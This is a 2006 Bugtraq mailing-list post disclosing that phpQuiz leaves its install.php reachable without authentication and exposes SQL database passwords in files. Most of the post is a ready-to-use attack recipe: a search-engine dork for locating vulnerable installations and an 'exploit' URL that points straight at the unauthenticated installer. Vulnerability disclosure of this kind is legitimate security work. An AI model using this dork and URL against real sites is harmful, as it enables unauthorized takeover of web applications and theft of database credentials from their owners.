[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpQuiz sensitive file (install.php)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpQuiz sensitive file (install.php)
From: sn_0py@xxxxxxxxxxx
Date: 15 Sep 2006 11:46:07 -0000

* phpQuiz sensitive file (install.php without authentification) + Files 
containing interesting info (passwords for sql db)

* By : sn0oPy

* Risk : verry high

* Site : http://phpquiz.com/

* Dork : intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0  " | "© PhpQuiz" | 
inurl:"PhpQuiz"

* exploit :
http://target.com/[phpquiz_path]/front/
replace by :
http://target.com/[phpquiz_path]/cfgphpquiz/install.php

* greetz : [subzero], Avg Team, Lhma9.

Prev by Date: Symantec Norton Insufficient validation of 'SymEvent' driver input buffer
Next by Date: BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
Previous by thread: Symantec Norton Insufficient validation of 'SymEvent' driver input buffer
Next by thread: BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
Index(es):
- Date
- Thread